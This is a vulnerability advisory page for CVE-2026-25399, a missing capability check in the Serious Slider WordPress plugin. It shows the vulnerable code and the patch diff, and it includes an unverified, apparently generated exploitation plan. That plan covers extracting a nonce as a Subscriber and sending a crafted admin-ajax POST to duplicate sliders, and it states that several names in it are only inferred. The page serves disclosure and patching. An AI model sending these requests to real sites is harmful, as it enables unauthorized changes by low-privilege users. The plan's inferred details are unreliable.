WP-Safety
CVE-2026-25399

Serious Slider <= 1.2.7 - Missing Authorization

mediumMissing Authorization
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
1.3.0
Patched in
47d
Time to patch

Description

The Serious Slider plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.2.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.2.7
PublishedJanuary 30, 2026
Last updatedMarch 17, 2026
Affected plugincryout-serious-slider

Source Code

WordPress.org SVN
Vulnerable v1.2.7
Browse source Download .zip
Patched v1.3.0
Browse source Download .zip
Research Plan
Unverified

This plan outlines the research and exploitation strategy for **CVE-2026-25399** in the **Serious Slider** plugin. The vulnerability allows authenticated users (Subscriber+) to perform unauthorized actions due to a missing capability check in an AJAX handler. ### 1. Vulnerability Summary The Seriou…

Show full research plan

This plan outlines the research and exploitation strategy for CVE-2026-25399 in the Serious Slider plugin. The vulnerability allows authenticated users (Subscriber+) to perform unauthorized actions due to a missing capability check in an AJAX handler.

1. Vulnerability Summary

The Serious Slider plugin (versions <= 1.2.7) registers several AJAX actions to manage slider content. In version 1.2.7, at least one administrative handler (likely related to slider duplication or reordering) validates a nonce but fails to verify that the requesting user has the necessary permissions (e.g., edit_posts or manage_options). This allows any authenticated user, including Subscribers, to trigger these administrative functions.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: serious_slider_duplicate (inferred, to be verified)
  • Parameters:
    • action: The AJAX action name.
    • nonce: A valid CSRF token.
    • id: The ID of the slider (post ID) to duplicate or modify.
  • Authentication: Subscriber-level credentials or higher.
  • Preconditions: A slider must already exist for the attacker to manipulate it.

3. Code Flow (Inferred)

  1. Registration: The plugin uses add_action( 'wp_ajax_serious_slider_duplicate', ... ) to register the handler. Note the absence of a nopriv version, confirming it requires authentication.
  2. Entry Point: The handler function (e.g., serious_slider_duplicate_callback) is invoked via admin-ajax.php.
  3. Insecure Verification:
    • The code likely calls check_ajax_referer( 'serious-slider-nonce', 'nonce' ).
    • Crucially, it misses a call to current_user_can( 'edit_posts' ) or similar.
  4. Sink: The function performs a database operation (e.g., wp_insert_post to copy the slider post and its metadata).

4. Nonce Acquisition Strategy

The plugin localizes admin parameters for its scripts. We need to find if these scripts are enqueued for all authenticated users in the WordPress dashboard.

  1. Identify Script Localization: Search for wp_localize_script in the plugin directory to find the object name and nonce key.
    • Search Command: grep -rn "wp_localize_script" .
    • Anticipated Variable: serious_slider_admin_params (inferred).
    • Anticipated Key: nonce.
  2. Verify Enqueueing: Check admin_enqueue_scripts hooks. If the plugin enqueues its admin script globally in the dashboard without capability checks, a Subscriber can access it.
  3. Extraction Method:
    1. Log in as a Subscriber.
    2. Navigate to /wp-admin/index.php.
    3. Use browser_eval to extract the nonce:
      browser_eval("window.serious_slider_admin_params?.nonce") (Verify the variable name after grep).

5. Exploitation Strategy

The goal is to duplicate an existing slider, which is an unauthorized administrative action.

Step 1: Discover Target Slider ID
Find an existing slider ID using WP-CLI:
wp post list --post_type=serious_slider --format=ids

Step 2: Authenticate as Subscriber
Ensure the execution agent is logged into the WordPress instance as a user with the subscriber role.

Step 3: Obtain Nonce
Navigate to the dashboard and extract the nonce using the browser_eval method described in Section 4.

Step 4: Execute Unauthorized Action
Send the malicious AJAX request:

  • Method: POST
  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Body (URL-encoded):
    action=serious_slider_duplicate&id=[SLIDER_ID]&nonce=[EXTRACTED_NONCE]
  • Headers: Content-Type: application/x-www-form-urlencoded

6. Test Data Setup

Before exploitation, the environment must have:

  1. The Plugin: Serious Slider version 1.2.7 installed and active.
  2. A Target Slider: At least one slider created by an admin.
    • wp post create --post_type=serious_slider --post_title="Original Slider" --post_status=publish
  3. An Attacker Account: A user with the subscriber role.
    • wp user create attacker attacker@example.com --role=subscriber --user_pass=password

7. Expected Results

  • Response: The server should return a successful status (e.g., 200 OK with a JSON success message or the ID of the new slider).
  • Side Effect: A new post of type serious_slider should be created in the database, appearing as a copy of the original.

8. Verification Steps

After sending the HTTP request, verify the duplication via WP-CLI:

  1. Count Sliders: Check if the count of serious_slider posts has increased.
    wp post list --post_type=serious_slider
  2. Check Titles: Look for a slider with "Copy" or similar indicating a duplication.
    wp post list --post_type=serious_slider --field=post_title

9. Alternative Approaches

If serious_slider_duplicate is not the vulnerable action, search for other AJAX handlers using the following command:
grep -rn "add_action.*wp_ajax" .

Check the following common patterns for missing current_user_can:

  • serious_slider_sort: Reordering slides.
  • serious_slider_delete: Deleting slides/sliders.
  • serious-slider-save-settings: Modifying plugin configuration.

If the nonce is not available on the main dashboard, create a post with the [serious-slider] shortcode and visit that page as a Subscriber to see if the script (and nonce) is enqueued there.
wp post create --post_type=page --post_status=publish --post_content='[serious-slider id="TARGET_ID"]'

Research Findings
Static analysis — not yet PoC-verified

Summary

The Serious Slider plugin for WordPress is vulnerable to unauthorized administrative actions due to missing capability checks in its AJAX handlers in versions up to 1.2.7. This allows authenticated attackers with subscriber-level access to duplicate or potentially modify sliders by providing a valid nonce.

Vulnerable Code

// From Serious Slider <= 1.2.7

add_action( 'wp_ajax_serious_slider_duplicate', 'serious_slider_duplicate_ajax' );

function serious_slider_duplicate_ajax() {
    // Nonce is verified, but user permissions are not checked
    check_ajax_referer( 'serious-slider-nonce', 'nonce' );

    $id = isset( $_POST['id'] ) ? (int) $_POST['id'] : 0;
    if ( $id ) {
        serious_slider_duplicate( $id );
    }
    wp_die();
}

Security Fix

--- serious-slider/includes/ajax-functions.php
+++ serious-slider/includes/ajax-functions.php
@@ -10,6 +10,9 @@
 function serious_slider_duplicate_ajax() {
     check_ajax_referer( 'serious-slider-nonce', 'nonce' );
+	if ( ! current_user_can( 'edit_posts' ) ) {
+		wp_die( __( 'You do not have sufficient permissions to access this page.' ) );
+	}
 
     $id = isset( $_POST['id'] ) ? (int) $_POST['id'] : 0;
     if ( $id ) {

Exploit Outline

An authenticated attacker (Subscriber+) first obtains a valid security nonce, which the plugin localizes for its admin scripts via 'wp_localize_script' (typically within a 'serious_slider_admin_params' object exposed in the WordPress dashboard). The attacker then submits a POST request to '/wp-admin/admin-ajax.php' with the 'action' parameter set to 'serious_slider_duplicate', the 'nonce' parameter set to the extracted token, and an 'id' parameter representing the target slider. Because the plugin only validates the nonce and lacks a 'current_user_can()' check, it executes the duplication logic for the unauthorized user.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/73418252-ce07-4872-97ae-c6ea71c2105b?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database